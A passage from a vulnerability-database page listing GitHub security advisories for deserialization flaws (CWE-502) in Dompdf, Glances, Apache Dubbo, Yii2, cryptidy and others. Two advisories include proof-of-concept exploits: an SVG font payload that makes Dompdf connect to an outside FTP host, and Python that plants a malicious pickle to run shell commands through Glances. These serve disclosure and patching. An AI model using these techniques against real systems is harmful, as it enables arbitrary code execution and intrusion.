Common Weakness Enumeration

CWE-502

Allowed

Deserialization of Untrusted Data

Abstraction: Base · Status: Draft

The product deserializes untrusted data without sufficiently ensuring that the resulting data will be valid.

4800 vulnerabilities reference this CWE, most recent first.

GHSA-979P-7MRM-3C5W

Vulnerability from github – Published: 2024-05-14 18:30 – Updated: 2024-05-14 18:30
VLAI
Details

Deserialization of Untrusted Data vulnerability in BdThemes Ultimate Store Kit Elementor Addons.This issue affects Ultimate Store Kit Elementor Addons: from n/a through 1.6.2.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-4606"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-05-14T15:44:12Z",
    "severity": "MODERATE"
  },
  "details": "Deserialization of Untrusted Data vulnerability in BdThemes Ultimate Store Kit Elementor Addons.This issue affects Ultimate Store Kit Elementor Addons: from n/a through 1.6.2.\n\n",
  "id": "GHSA-979p-7mrm-3c5w",
  "modified": "2024-05-14T18:30:55Z",
  "published": "2024-05-14T18:30:55Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-4606"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/vulnerability/ultimate-store-kit/wordpress-ultimate-store-kit-elementor-addons-woocommerce-builder-edd-builder-plugin-1-6-2-php-object-injection-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-97GG-2M4J-JJ6Q

Vulnerability from github – Published: 2023-09-27 15:30 – Updated: 2024-04-04 07:54
VLAI
Details

Deserialization of Untrusted Data in emlog pro v.2.1.15 and earlier allows a remote attacker to execute arbitrary code via the cache.php component.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-43291"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-09-27T15:19:33Z",
    "severity": "CRITICAL"
  },
  "details": "Deserialization of Untrusted Data in emlog pro v.2.1.15 and earlier allows a remote attacker to execute arbitrary code via the cache.php component.",
  "id": "GHSA-97gg-2m4j-jj6q",
  "modified": "2024-04-04T07:54:45Z",
  "published": "2023-09-27T15:30:38Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43291"
    },
    {
      "type": "WEB",
      "url": "https://gist.github.com/Dar1in9s/e3db6b04daacb68633a97581bbd5921b"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-97J9-4XHC-69QJ

Vulnerability from github – Published: 2026-04-24 00:31 – Updated: 2026-04-24 00:31
VLAI
Details

Deserialization of untrusted data in Microsoft Bing allows an unauthorized attacker to execute code over a network.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-33819"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-04-23T22:16:37Z",
    "severity": "CRITICAL"
  },
  "details": "Deserialization of untrusted data in Microsoft Bing allows an unauthorized attacker to execute code over a network.",
  "id": "GHSA-97j9-4xhc-69qj",
  "modified": "2026-04-24T00:31:51Z",
  "published": "2026-04-24T00:31:51Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33819"
    },
    {
      "type": "WEB",
      "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33819"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-97M3-52WR-XVV2

Vulnerability from github – Published: 2024-02-22 18:15 – Updated: 2024-02-23 21:19
VLAI
Summary
Dompdf's usage of vulnerable version of phenx/php-svg-lib leads to restriction bypass and potential RCE
Details

Summary

A lack of sanitization/check in the font path returned by php-svg-lib, in the case of a inline CSS font defined, that will be used by Cpdf to open a font will be passed to a file_exists call, which is sufficient to trigger metadata unserializing on a PHAR file, through the phar:// URL handler on PHP < 8.0. On other versions, it might be used as a way to get a SSRF through, for example, ftp, not restricted by authorized protocols configured on dompdf.

Details

The problem lies on the openFont function of the lib/Cpdf.php library, when the $font variable passed by php-svg-lib isn't checked correctly. A path is crafted through $name and $dir, which are two values that can be controlled through CSS :

$name = basename($font);
$dir = dirname($font);
[...]
$metrics_name = "$name.ufm";
[...]

if (!isset($this->fonts[$font]) && file_exists("$dir/$metrics_name")) {

Passing a font named phar:///foo/bar/baz.phar/test will set the value of $name to test and $dir to phar:///foo/bar/baz.phar, which once reconstructed will call file_exists on phar:///foo/bar/baz.phar/test.ufm. That allows to deserialize the baz.phar arbitrary file that contains a test.ufm file in the archive.

PoC

Consider the following, minimal PHP code :

<?php
require('vendor/autoload.php');

use Dompdf\Dompdf;
$dompdf = new Dompdf();
$dompdf->loadHtml($_GET['payload']);
$dompdf->setPaper('A4', 'landscape');
$options = $dompdf->getOptions();
$options->setAllowedProtocols([]);
$dompdf->render();
$dompdf->stream();

With payload being this html file :

<html>
<img src="data:image/png;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiIHN0YW5kYWxvbmU9Im5vIj8+DQo8c3ZnIHhtbG5zOnN2Zz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgeG1sbnM6eGxpbms9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGxpbmsiIHdpZHRoPSIyMDAiIGhlaWdodD0iMjAwIj4NCiAgICA8dGV4dCB4PSIyMCIgeT0iMzUiIHN0eWxlPSJjb2xvcjpyZWQ7Zm9udC1mYW1pbHk6ZnRwOi8vYmxha2wuaXM6MjEveC95OyI+TXk8L3RleHQ+DQo8L3N2Zz4="></img>
</html>

with the base64 image being :

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200">
    <text x="20" y="35" style="color:red;font-family:ftp://blakl.is:21/x/y;">My</text>
</svg>

A connection on ftp://blakl.is:21/ will occur, bypassing the allowed protocols.

Impact

An attacker might be able to exploit the vulnerability to call arbitrary URL with arbitrary protocols, if they can force dompdf to parse a SVG with an inline CSS property using a malicious font-family. In PHP versions before 8.0.0, it leads to arbitrary unserialize, that will leads at the very least to an arbitrary file deletion, and might leads to remote code execution, depending on classes that are available.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "phenx/php-svg-lib"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.5.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-502",
      "CWE-73"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-02-22T18:15:41Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "### Summary\nA lack of sanitization/check in the font path returned by php-svg-lib, in the case of a inline CSS font defined, that will be used by Cpdf to open a font will be passed to a `file_exists` call, which is sufficient to trigger metadata unserializing on a PHAR file, through the phar:// URL handler on PHP \u003c 8.0. On other versions, it might be used as a way to get a SSRF through, for example, ftp, not restricted by authorized protocols configured on dompdf.\n\n### Details\nThe problem lies on the `openFont` function of the `lib/Cpdf.php` library, when the `$font` variable passed by php-svg-lib isn\u0027t checked correctly. A path is crafted through $name and $dir, which are two values that can be controlled through CSS : \n\n```\n$name = basename($font);\n$dir = dirname($font);\n[...]\n$metrics_name = \"$name.ufm\";\n[...]\n\nif (!isset($this-\u003efonts[$font]) \u0026\u0026 file_exists(\"$dir/$metrics_name\")) {\n```\n\nPassing a font named `phar:///foo/bar/baz.phar/test` will set the value of $name to `test` and $dir to `phar:///foo/bar/baz.phar`, which once reconstructed will call file_exists on `phar:///foo/bar/baz.phar/test.ufm`. That allows to deserialize the `baz.phar` arbitrary file that contains a `test.ufm` file in the archive.\n\n\n### PoC\n\nConsider the following, minimal PHP code : \n\n```\n\u003c?php\nrequire(\u0027vendor/autoload.php\u0027);\n\nuse Dompdf\\Dompdf;\n$dompdf = new Dompdf();\n$dompdf-\u003eloadHtml($_GET[\u0027payload\u0027]);\n$dompdf-\u003esetPaper(\u0027A4\u0027, \u0027landscape\u0027);\n$options = $dompdf-\u003egetOptions();\n$options-\u003esetAllowedProtocols([]);\n$dompdf-\u003erender();\n$dompdf-\u003estream();\n```\n\nWith payload being this html file : \n\n```\n\u003chtml\u003e\n\u003cimg src=\"data:image/png;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiIHN0YW5kYWxvbmU9Im5vIj8+DQo8c3ZnIHhtbG5zOnN2Zz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgeG1sbnM6eGxpbms9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGxpbmsiIHdpZHRoPSIyMDAiIGhlaWdodD0iMjAwIj4NCiAgICA8dGV4dCB4PSIyMCIgeT0iMzUiIHN0eWxlPSJjb2xvcjpyZWQ7Zm9udC1mYW1pbHk6ZnRwOi8vYmxha2wuaXM6MjEveC95OyI+TXk8L3RleHQ+DQo8L3N2Zz4=\"\u003e\u003c/img\u003e\n\u003c/html\u003e\n```\n\nwith the base64 image being : \n```\n\u003c?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"no\"?\u003e\n\u003csvg xmlns:svg=\"http://www.w3.org/2000/svg\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" width=\"200\" height=\"200\"\u003e\n    \u003ctext x=\"20\" y=\"35\" style=\"color:red;font-family:ftp://blakl.is:21/x/y;\"\u003eMy\u003c/text\u003e\n\u003c/svg\u003e\n```\n\nA connection on ftp://blakl.is:21/ will occur, bypassing the allowed protocols.\n\n### Impact\nAn attacker might be able to exploit the vulnerability to call arbitrary URL with arbitrary protocols, if they can force dompdf to parse a SVG with an inline CSS property using a malicious font-family. In PHP versions before 8.0.0, it leads to arbitrary unserialize, that will leads at the very least to an arbitrary file deletion, and might leads to remote code execution, depending on classes that are available.",
  "id": "GHSA-97m3-52wr-xvv2",
  "modified": "2024-02-23T21:19:15Z",
  "published": "2024-02-22T18:15:41Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/dompdf/dompdf/security/advisories/GHSA-97m3-52wr-xvv2"
    },
    {
      "type": "WEB",
      "url": "https://github.com/dompdf/php-svg-lib/security/advisories/GHSA-f3qr-qr4x-j273"
    },
    {
      "type": "WEB",
      "url": "https://github.com/dompdf/php-svg-lib/commit/732faa9fb4309221e2bd9b2fda5de44f947133aa"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/dompdf/dompdf"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Dompdf\u0027s usage of vulnerable version of phenx/php-svg-lib leads to restriction bypass and potential RCE"
}

GHSA-97Q7-CQC5-X5GJ

Vulnerability from github – Published: 2025-03-24 09:34 – Updated: 2025-03-24 09:34
VLAI
Details

A vulnerability, which was classified as critical, was found in yiisoft Yii2 up to 2.0.39. This affects the function Generate of the file phpunit\src\Framework\MockObject\MockClass.php. The manipulation leads to deserialization. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-2690"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-20",
      "CWE-502"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-03-24T08:15:12Z",
    "severity": "MODERATE"
  },
  "details": "A vulnerability, which was classified as critical, was found in yiisoft Yii2 up to 2.0.39. This affects the function Generate of the file phpunit\\src\\Framework\\MockObject\\MockClass.php. The manipulation leads to deserialization. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.",
  "id": "GHSA-97q7-cqc5-x5gj",
  "modified": "2025-03-24T09:34:03Z",
  "published": "2025-03-24T09:34:02Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-2690"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gaorenyusi/gaorenyusi/blob/main/Yii2-2.md"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?ctiid.300711"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?id.300711"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?submit.521718"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-97RV-88GF-PHVR

Vulnerability from github – Published: 2023-12-15 09:30 – Updated: 2025-02-13 19:28
VLAI
Summary
Apache Dubbo: Bypass deny serialize list check in Apache Dubbo
Details

Deserialization of Untrusted Data vulnerability in Apache Dubbo.This issue only affects Apache Dubbo 3.1.5.

Users are recommended to upgrade to the latest version, which fixes the issue.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.apache.dubbo:dubbo"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.1.5"
            },
            {
              "fixed": "3.1.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "3.1.5"
      ]
    }
  ],
  "aliases": [
    "CVE-2023-46279"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-12-15T23:25:04Z",
    "nvd_published_at": "2023-12-15T09:15:07Z",
    "severity": "CRITICAL"
  },
  "details": "Deserialization of Untrusted Data vulnerability in Apache Dubbo.This issue only affects Apache Dubbo 3.1.5.\n\nUsers are recommended to upgrade to the latest version, which fixes the issue.",
  "id": "GHSA-97rv-88gf-phvr",
  "modified": "2025-02-13T19:28:14Z",
  "published": "2023-12-15T09:30:17Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-46279"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/apache/dubbo"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread/zw53nxrkrfswmk9n3sfwxmcj7x030nmo"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2023/12/15/3"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Apache Dubbo: Bypass deny serialize list check in Apache Dubbo"
}

GHSA-97W9-V595-3H5Q

Vulnerability from github – Published: 2025-10-31 09:30 – Updated: 2025-10-31 17:56
VLAI
Summary
cryptidy allows code execution via untrusted data due to pickle.loads
Details

cryptidy through 1.2.4 allows code execution via untrusted data because pickle.loads is used. This occurs in aes_decrypt_message in symmetric_encryption.py.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "cryptidy"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "1.2.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-63675"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-10-31T17:56:11Z",
    "nvd_published_at": "2025-10-31T07:15:38Z",
    "severity": "MODERATE"
  },
  "details": "cryptidy through 1.2.4 allows code execution via untrusted data because pickle.loads is used. This occurs in aes_decrypt_message in symmetric_encryption.py.",
  "id": "GHSA-97w9-v595-3h5q",
  "modified": "2025-10-31T17:56:11Z",
  "published": "2025-10-31T09:30:25Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-63675"
    },
    {
      "type": "WEB",
      "url": "https://github.com/javiermorales36/cryptidy-analysis"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/netinvent/cryptidy"
    },
    {
      "type": "WEB",
      "url": "https://github.com/netinvent/cryptidy/blob/cebc9ffd54cc20679d15a1a43ca9a5da645b0c58/cryptidy/symmetric_encryption.py#L220-L238"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "cryptidy allows code execution via untrusted data due to pickle.loads "
}

GHSA-9837-48HR-Q32J

Vulnerability from github – Published: 2026-06-22 21:21 – Updated: 2026-06-22 21:21
VLAI
Summary
Glances has Insecure Pickle Deserialization in its Version Cache that Leads to Arbitrary Code Execution
Details

Summary

glances/outdated.py uses pickle.load() to read a version-check cache file stored at a predictable, world-accessible path (~/.cache/glances/glances-version.db or $XDG_CACHE_HOME/glances/glances-version.db). No integrity check, signature verification, or format validation is performed before deserialization. An attacker with write access to that path — through any of several realistic local or container-level scenarios — can plant a malicious pickle file and achieve arbitrary code execution as the OS user running Glances the next time it starts with version checking enabled (the default).


Details

Affected file: glances/outdated.py, method Outdated._load_cache(), line 121

Direct URL (commit 04579778e733d705898a169e049dc84772c852da): - https://github.com/nicolargo/glances/blob/04579778e733d705898a169e049dc84772c852da/glances/outdated.py#L121

# outdated.py  (_load_cache, line 119-127)
try:
    with open(self.cache_file, 'rb') as f:
        cached_data = pickle.load(f)          # ← no integrity check
except Exception as e:
    logger.debug(f"Cannot read version from cache file: {self.cache_file} ({e})")
    ...

self.cache_file is constructed from the XDG cache directory path at Outdated.__init__():

# outdated.py  (__init__)
self.cache_file = os.path.join(
    user_cache_dir('glances')[0],
    'glances-version.db'
)

On a default Linux installation this resolves to /home/john/.cache/glances/glances-version.db (or /root/.cache/glances/… when Glances runs as root).

Python's pickle module is an execution-capable serialisation format: any class that implements __reduce__ can embed an arbitrary callable and argument tuple that Python will invoke unconditionally at pickle.load() time. There is no safe subset of pickle; the only safe mitigation is to not use it for untrusted data.

The code was verified on x86_64 Linux, Python 3.13, Glances 4.5.5_dev1 (commit 04579778e733d705898a169e049dc84772c852da). A malicious pickle crafted with os.system() via __reduce__ executed the injected shell command successfully before the surrounding Python code raised a TypeError.


PoC

Special configuration required

No non-default Glances configuration is needed. Version checking is enabled by default (check_update = true). The only pre condition is that the attacker can write to the Glances user's XDG cache directory — see the attack scenarios below for how this arises in practice.


Attack scenario A — local privilege escalation (shared multi-user host)

Prerequisites: Glances runs periodically (e.g. via systemd or cron) as a privileged user (root or a dedicated monitoring account). The attacker is an unprivileged local user who has write access to the Glances user's ~/.cache/glances/ directory (e.g. the directory or an ancestor is group- or world-writable, or was created with overly permissive umask).

Step 1 — Identify the cache path

python3 -c "from glances.config import user_cache_dir; print(user_cache_dir()[0])"
# Example output: /root/.cache/glances

Step 2 — Craft and plant a malicious pickle

import pickle, os, pathlib

class MaliciousPayload:
    def __reduce__(self):
        # This command runs as the Glances process user
        cmd = 'id >> /tmp/glances_rce_proof.txt'
        return (os.system, (cmd,))

cache_dir  = pathlib.Path('/root/.cache/glances')   # adjust to target
cache_file = cache_dir / 'glances-version.db'
cache_dir.mkdir(parents=True, exist_ok=True)
cache_file.write_bytes(pickle.dumps(MaliciousPayload()))
print(f'Payload written to {cache_file}')

Step 3 — Wait for Glances to start (or restart it)

Glances calls _load_cache() automatically at startup when check_update = true (the compiled-in default). No special configuration is required by the attacker.

Step 4 — Verify execution

cat /tmp/glances_rce_proof.txt
# uid=0(root) gid=0(root) groups=0(root)    ← output from the Glances-user context

Attack scenario B — container / shared-volume poisoning

A compromised container that shares a Docker/Podman volume with the Glances container can write to the cache path on the shared volume. The next time Glances restarts (e.g. after a rolling update), the payload executes inside the Glances container with its privileges.


Attack scenario C — symlink race (TOCTOU)

Before the Glances cache directory is created for the first time (e.g. on a fresh installation), an attacker with write access to ~/.cache/ can create a symlink:

mkdir -p /home/john/.cache
ln -s /tmp/attacker_controlled /home/john/.cache/glances

When Glances writes its legitimate cache file it writes instead to /tmp/attacker_controlled/glances-version.db, which the attacker can replace with the malicious pickle before the next start.


Minimal self-contained reproduction

import sys, os, pickle, pathlib, argparse

sys.path.insert(0, '/path/to/glances')   # adjust to local clone

FAKE_CACHE = pathlib.Path('/tmp/glances_test_cache')
CACHE_FILE = FAKE_CACHE / 'glances-version.db'
FAKE_CACHE.mkdir(parents=True, exist_ok=True)

class Exploit:
    def __reduce__(self):
        return (os.system, ('echo RCE_confirmed >> /tmp/glances_rce.txt',))

CACHE_FILE.write_bytes(pickle.dumps(Exploit()))

# Reproduce the exact Glances code path
from glances.outdated import Outdated
obj = object.__new__(Outdated)
obj.args = argparse.Namespace(disable_check_update=False, time=2)
obj.data = {}
obj.cache_file = str(CACHE_FILE)

try:
    obj._load_cache()            # pickle.load() fires here
except Exception:
    pass                         # expected: int not subscriptable

import time; time.sleep(0.2)
print(pathlib.Path('/tmp/glances_rce.txt').read_text())
# Prints: RCE_confirmed

Impact

Vulnerability type: Insecure Deserialization (CWE-502)

Who is impacted: Any system where Glances is run with version checking enabled (the default) in a shared environment where a less-privileged process can write to the Glances user's XDG cache directory, or in any containerised deployment using shared volumes.

Impact: - Confidentiality: Full — the attacker gains code execution in the context of the Glances process and can read any data accessible to that user. - Integrity: Full — arbitrary commands can modify files, install persistence mechanisms, or alter system state. - Availability: Full — the Glances process and, if running as root, the system can be disrupted.

On many deployments Glances is run as root (required to access hardware performance counters without specific capabilities), meaning successful exploitation yields full root code execution without any further privilege escalation step.


Suggested Fix

Replace pickle with json for the version cache. The data stored is a simple Python dictionary containing two string values and a datetime object; a JSON representation is straightforward:

import json
from datetime import datetime

# Saving
with open(self.cache_file, 'w', encoding='utf-8') as f:
    json.dump({
        'installed_version': self.installed_version(),
        'latest_version':    latest,
        'refresh_date':      datetime.now().isoformat(),
    }, f)

# Loading
with open(self.cache_file, 'r', encoding='utf-8') as f:
    cached_data = json.load(f)
    cached_data['refresh_date'] = datetime.fromisoformat(cached_data['refresh_date'])

If pickle is retained for any reason, the cache file must be protected with an HMAC keyed from a Glances-managed secret (e.g. a random key stored in the Glances config directory, which should itself be mode 0600).

As an additional hardening measure, restrict the permissions of the Glances cache directory to 0700 at creation time.


Responsible Disclosure

The AFINE Team is committed to responsible / coordinated disclosure. The AFINE Team will not publish details of this vulnerability or release exploit code publicly until a fix has been released, or 90 days have elapsed from the date of this report, whichever comes first.


Credits

This issue was identified by Michał Majchrowicz and Marcin Wyczechowski, members of the AFINE Team.


Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "glances"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.5.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-46607"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-22T21:21:07Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\n\n`glances/outdated.py` uses `pickle.load()` to read a version-check cache file stored at a predictable, world-accessible path (`~/.cache/glances/glances-version.db` or `$XDG_CACHE_HOME/glances/glances-version.db`). No integrity check, signature verification, or format validation is performed before deserialization.  An attacker with write access to that path \u2014 through any of several realistic local or container-level scenarios \u2014 can plant a malicious pickle file and achieve arbitrary code execution as the OS user running Glances the next time it starts with version checking enabled (the default).\n\n---\n\n### Details\n\n**Affected file:** `glances/outdated.py`, method `Outdated._load_cache()`, line 121\n\n**Direct URL (commit 04579778e733d705898a169e049dc84772c852da):**\n- https://github.com/nicolargo/glances/blob/04579778e733d705898a169e049dc84772c852da/glances/outdated.py#L121\n\n```python\n# outdated.py  (_load_cache, line 119-127)\ntry:\n    with open(self.cache_file, \u0027rb\u0027) as f:\n        cached_data = pickle.load(f)          # \u2190 no integrity check\nexcept Exception as e:\n    logger.debug(f\"Cannot read version from cache file: {self.cache_file} ({e})\")\n    ...\n```\n\n`self.cache_file` is constructed from the XDG cache directory path at `Outdated.__init__()`:\n\n```python\n# outdated.py  (__init__)\nself.cache_file = os.path.join(\n    user_cache_dir(\u0027glances\u0027)[0],\n    \u0027glances-version.db\u0027\n)\n```\n\nOn a default Linux installation this resolves to `/home/john/.cache/glances/glances-version.db` (or `/root/.cache/glances/\u2026` when Glances runs as root).\n\nPython\u0027s `pickle` module is an execution-capable serialisation format: any class that implements `__reduce__` can embed an arbitrary callable and argument tuple that Python will invoke unconditionally at `pickle.load()` time.  There is no safe subset of pickle; the only safe mitigation is to not use it for untrusted data.\n\nThe code was verified on x86_64 Linux, Python 3.13, Glances 4.5.5_dev1 (commit 04579778e733d705898a169e049dc84772c852da).  A malicious pickle crafted with `os.system()` via `__reduce__` executed the injected shell command successfully before the surrounding Python code raised a `TypeError`.\n\n---\n\n### PoC\n\n**Special configuration required**\n\nNo non-default Glances configuration is needed.  Version checking is enabled by default (`check_update = true`).  The only pre condition is that the attacker can write to the Glances user\u0027s XDG cache directory \u2014 see the attack scenarios below for how this arises in practice.\n\n---\n\n**Attack scenario A \u2014 local privilege escalation (shared multi-user host)**\n\nPrerequisites: Glances runs periodically (e.g. via systemd or cron) as a privileged user (root or a dedicated monitoring account).  The attacker is an unprivileged local user who has write access to the Glances user\u0027s `~/.cache/glances/` directory (e.g. the directory or an ancestor is group- or world-writable, or was created with overly permissive umask).\n\n**Step 1 \u2014 Identify the cache path**\n\n```bash\npython3 -c \"from glances.config import user_cache_dir; print(user_cache_dir()[0])\"\n# Example output: /root/.cache/glances\n```\n\n**Step 2 \u2014 Craft and plant a malicious pickle**\n\n```python\nimport pickle, os, pathlib\n\nclass MaliciousPayload:\n    def __reduce__(self):\n        # This command runs as the Glances process user\n        cmd = \u0027id \u003e\u003e /tmp/glances_rce_proof.txt\u0027\n        return (os.system, (cmd,))\n\ncache_dir  = pathlib.Path(\u0027/root/.cache/glances\u0027)   # adjust to target\ncache_file = cache_dir / \u0027glances-version.db\u0027\ncache_dir.mkdir(parents=True, exist_ok=True)\ncache_file.write_bytes(pickle.dumps(MaliciousPayload()))\nprint(f\u0027Payload written to {cache_file}\u0027)\n```\n\n**Step 3 \u2014 Wait for Glances to start (or restart it)**\n\nGlances calls `_load_cache()` automatically at startup when `check_update = true` (the compiled-in default). No special configuration is required by the attacker.\n\n**Step 4 \u2014 Verify execution**\n\n```bash\ncat /tmp/glances_rce_proof.txt\n# uid=0(root) gid=0(root) groups=0(root)    \u2190 output from the Glances-user context\n```\n\n---\n\n**Attack scenario B \u2014 container / shared-volume poisoning**\n\nA compromised container that shares a Docker/Podman volume with the Glances container can write to the cache path on the shared volume. The next time Glances restarts (e.g. after a rolling update), the payload executes inside the Glances container with its privileges.\n\n---\n\n**Attack scenario C \u2014 symlink race (TOCTOU)**\n\nBefore the Glances cache directory is created for the first time (e.g. on a fresh installation), an attacker with write access to `~/.cache/` can create a symlink:\n\n```bash\nmkdir -p /home/john/.cache\nln -s /tmp/attacker_controlled /home/john/.cache/glances\n```\n\nWhen Glances writes its legitimate cache file it writes instead to `/tmp/attacker_controlled/glances-version.db`, which the attacker can replace with the malicious pickle before the next start.\n\n---\n\n**Minimal self-contained reproduction**\n\n```python\nimport sys, os, pickle, pathlib, argparse\n\nsys.path.insert(0, \u0027/path/to/glances\u0027)   # adjust to local clone\n\nFAKE_CACHE = pathlib.Path(\u0027/tmp/glances_test_cache\u0027)\nCACHE_FILE = FAKE_CACHE / \u0027glances-version.db\u0027\nFAKE_CACHE.mkdir(parents=True, exist_ok=True)\n\nclass Exploit:\n    def __reduce__(self):\n        return (os.system, (\u0027echo RCE_confirmed \u003e\u003e /tmp/glances_rce.txt\u0027,))\n\nCACHE_FILE.write_bytes(pickle.dumps(Exploit()))\n\n# Reproduce the exact Glances code path\nfrom glances.outdated import Outdated\nobj = object.__new__(Outdated)\nobj.args = argparse.Namespace(disable_check_update=False, time=2)\nobj.data = {}\nobj.cache_file = str(CACHE_FILE)\n\ntry:\n    obj._load_cache()            # pickle.load() fires here\nexcept Exception:\n    pass                         # expected: int not subscriptable\n\nimport time; time.sleep(0.2)\nprint(pathlib.Path(\u0027/tmp/glances_rce.txt\u0027).read_text())\n# Prints: RCE_confirmed\n```\n\n---\n\n### Impact\n\n**Vulnerability type:** Insecure Deserialization (CWE-502)\n\n**Who is impacted:** Any system where Glances is run with version checking enabled (the default) in a shared environment where a less-privileged process can write to 